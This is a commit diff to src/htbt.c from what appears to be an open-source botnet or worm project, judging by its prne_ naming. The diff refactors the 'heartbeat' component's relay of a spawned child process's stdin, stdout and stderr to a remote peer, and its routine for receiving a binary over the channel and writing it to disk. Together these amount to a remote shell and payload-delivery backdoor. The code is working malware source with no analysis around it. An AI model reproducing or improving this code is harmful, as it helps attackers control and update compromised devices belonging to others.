aboutsummaryrefslogtreecommitdiff
path: root/src/htbt.c
diff options
context:
space:
mode:
Diffstat (limited to 'src/htbt.c')
-rw-r--r--src/htbt.c188
1 files changed, 105 insertions, 83 deletions
diff --git a/src/htbt.c b/src/htbt.c
index 87cc852..2081c7f 100644
--- a/src/htbt.c
+++ b/src/htbt.c
@@ -368,12 +368,13 @@ static prne_htbt_status_code_t htbt_relay_child (
pfd[2].events = 0;
}
- pfd[3].events = 0;
- pfd[4].events = 0;
- if (ctx->iobuf[1].len == 0) {
- if (pfd[3 + out_p].fd < 0) {
- out_p = (out_p + 1) % 2;
- }
+ if (ctx->iobuf[1].len == 0 && sh[1].len == 0) {
+ pfd[3].events = pfd[4].events = POLLIN;
+ }
+ else if (ctx->iobuf[1].len > 0) {
+ pfd[3].events = pfd[4].events = 0;
+ }
+ else if (sh[1].len) {
pfd[3 + out_p].events = POLLIN;
}
@@ -399,44 +400,6 @@ static prne_htbt_status_code_t htbt_relay_child (
}
// Handle events
- if (!sh[0].fin && sh[0].len == 0) {
- do {
- if (prne_htbt_dser_msg_head(
- ctx->iobuf[0].m,
- ctx->iobuf[0].len,
- &actual,
- &mh) != PRNE_HTBT_SER_RC_OK)
- {
- break;
- }
- consume = actual;
- if (mh.id != msg_id ||
- mh.is_rsp ||
- mh.op != PRNE_HTBT_OP_STDIO)
- {
- sh[0].fin = true;
- break;
- }
- if (prne_htbt_dser_stdio(
- ctx->iobuf[0].m + consume,
- ctx->iobuf[0].len - consume,
- &actual,
- sh + 0) != PRNE_HTBT_SER_RC_OK)
- {
- break;
- }
- consume += actual;
- prne_iobuf_shift(ctx->iobuf + 0, -consume);
- } while (false);
-
- if (sh[0].len == 0 && pfd[0].fd < 0) {
- // There's still pending stdin data and EOF.
- // This is proto err.
- ret = PRNE_HTBT_STATUS_PROTO_ERR;
- break;
- }
- }
-
if (pfd[0].revents) {
f_ret = ctx->read_f(
ctx->ioctx,
@@ -470,37 +433,21 @@ static prne_htbt_status_code_t htbt_relay_child (
}
else {
sh[1].len -= f_ret;
- if (sh[1].len == 0) {
- out_p = (out_p + 1) % 2;
- }
}
}
}
- consume = prne_op_min(ctx->iobuf[0].len, sh[0].len);
- if (pfd[2].fd < 0 && sh[0].len > 0) {
- // Stdin data coming in, but the child has already closed stdin
- prne_iobuf_shift(ctx->iobuf + 0, -consume);
- sh[0].len -= consume;
- }
- else if (pfd[2].revents) {
- f_ret = write(*c_in, ctx->iobuf[0].m, consume);
- if (f_ret > 0) {
- consume = f_ret;
+ if (ctx->iobuf[1].len == 0 && sh[1].len == 0) {
+ if (pfd[3].revents && pfd[4].revents) {
+ // round-robin stdout and stderr
+ out_p = (out_p + 1) % 2;
}
- else {
- pfd[2].fd = -1;
+ else if (pfd[3].revents) {
+ out_p = 0;
+ }
+ else if (pfd[4].revents) {
+ out_p = 1;
}
-
- prne_iobuf_shift(ctx->iobuf + 0, -consume);
- sh[0].len -= consume;
- }
-
- if (sh[0].fin && sh[0].len == 0 && pfd[2].fd >= 0) {
- // End of stdin stream
- close(*c_in);
- *c_in = -1;
- pfd[2].fd = -1;
}
if (pfd[3 + out_p].revents) {
@@ -548,6 +495,70 @@ static prne_htbt_status_code_t htbt_relay_child (
prne_iobuf_shift(ctx->iobuf + 1, f_ret);
}
}
+
+ if (!sh[0].fin && sh[0].len == 0) {
+ do {
+ if (prne_htbt_dser_msg_head(
+ ctx->iobuf[0].m,
+ ctx->iobuf[0].len,
+ &actual,
+ &mh) != PRNE_HTBT_SER_RC_OK)
+ {
+ break;
+ }
+ consume = actual;
+ if (mh.id != msg_id ||
+ mh.is_rsp ||
+ mh.op != PRNE_HTBT_OP_STDIO)
+ {
+ sh[0].fin = true;
+ break;
+ }
+ if (prne_htbt_dser_stdio(
+ ctx->iobuf[0].m + consume,
+ ctx->iobuf[0].len - consume,
+ &actual,
+ sh + 0) != PRNE_HTBT_SER_RC_OK)
+ {
+ break;
+ }
+ consume += actual;
+ prne_iobuf_shift(ctx->iobuf + 0, -consume);
+ } while (false);
+
+ if (sh[0].len == 0 && pfd[0].fd < 0) {
+ // There's still pending stdin data and EOF.
+ // This is proto err.
+ ret = PRNE_HTBT_STATUS_PROTO_ERR;
+ break;
+ }
+ }
+
+ consume = prne_op_min(ctx->iobuf[0].len, sh[0].len);
+ if (pfd[2].fd < 0 && sh[0].len > 0) {
+ // Stdin data coming in, but the child has already closed stdin
+ prne_iobuf_shift(ctx->iobuf + 0, -consume);
+ sh[0].len -= consume;
+ }
+ else if (pfd[2].revents) {
+ f_ret = write(*c_in, ctx->iobuf[0].m, consume);
+ if (f_ret > 0) {
+ consume = f_ret;
+ }
+ else {
+ pfd[2].fd = -1;
+ }
+
+ prne_iobuf_shift(ctx->iobuf + 0, -consume);
+ sh[0].len -= consume;
+ }
+
+ if (sh[0].fin && sh[0].len == 0 && pfd[2].fd >= 0) {
+ // End of stdin stream
+ close(*c_in);
+ *c_in = -1;
+ pfd[2].fd = -1;
+ }
}
prne_htbt_free_stdio(sh + 0);
@@ -871,6 +882,9 @@ static void htbt_slv_fab_frame (
prne_assert(req <= ctx->iobuf[1].size);
htbt_slv_consume_outbuf(ctx, req, ev);
+ if (!ctx->valid) {
+ return;
+ }
if (PRNE_VERBOSE >= PRNE_VL_DBG0) {
#if PRNE_DEBUG
@@ -1176,14 +1190,14 @@ static bool htbt_slv_srv_bin (
pfd.fd = ctx->fd[0];
pfd.events = POLLIN;
- while (bin_meta.bin_size > 0) {
+ while (bin_meta.bin_size > 0 || ctx->iobuf[0].len > 0) {
pth_event_free(ev, FALSE);
ev = pth_event(
PTH_EVENT_TIME,
prne_pth_tstimeout(HTBT_DL_TICK_TIMEOUT));
prne_assert(ev != NULL);
- if (ctx->iobuf[0].len == 0) {
+ if (bin_meta.bin_size > 0 && ctx->iobuf[0].avail > 0) {
f_ret = prne_pth_poll(&pfd, 1, -1, ev);
if (pth_event_status(ev) == PTH_STATUS_OCCURRED ||
f_ret == 0)
@@ -1196,27 +1210,35 @@ static bool htbt_slv_srv_bin (
if (pfd.revents) {
f_ret = ctx->read_f(
ctx->ioctx,
- ctx->iobuf[0].m,
- ctx->iobuf[0].avail);
+ ctx->iobuf[0].m + ctx->iobuf[0].len,
+ prne_op_min(bin_meta.bin_size, ctx->iobuf[0].avail));
if (f_ret <= 0) {
if (f_ret < 0) {
ctx->valid = false;
}
goto PROTO_ERR;
}
+ if (PRNE_VERBOSE >= PRNE_VL_DBG0) {
+ prne_dbgpf(
+ HTBT_NT_SLV"@%"PRIuPTR": < bin dl %d bytes.\n",
+ (uintptr_t)ctx,
+ f_ret);
+ }
prne_iobuf_shift(ctx->iobuf + 0, f_ret);
+ bin_meta.bin_size -= f_ret;
}
}
- actual = prne_op_min(bin_meta.bin_size, ctx->iobuf[0].len);
- // This blocks!
- f_ret = write(fd, ctx->iobuf[0].m, actual);
- prne_iobuf_shift(ctx->iobuf + 0, -actual);
- bin_meta.bin_size -= actual;
- if (f_ret < 0) {
- ret_status = PRNE_HTBT_STATUS_ERRNO;
- ret_errno = errno;
- goto SND_STATUS;
+ if (ctx->iobuf[0].len > 0) {
+ // This blocks!
+ f_ret = write(fd, ctx->iobuf[0].m, ctx->iobuf[0].len);
+ if (f_ret < 0) {
+ ret_status = PRNE_HTBT_STATUS_ERRNO;
+ ret_errno = errno;
+ ctx->skip += bin_meta.bin_size;
+ goto SND_STATUS;
+ }
+ prne_iobuf_shift(ctx->iobuf + 0, -f_ret);
}
}
close(fd);
@@ -1268,7 +1290,7 @@ SND_STATUS:
END:
ctx->skip = bin_meta.bin_size;
prne_htbt_free_bin_meta(&bin_meta);
- if (path[0] != 0) {
+ if (path != NULL && path[0] != 0) {
unlink(path);
}
prne_free(path);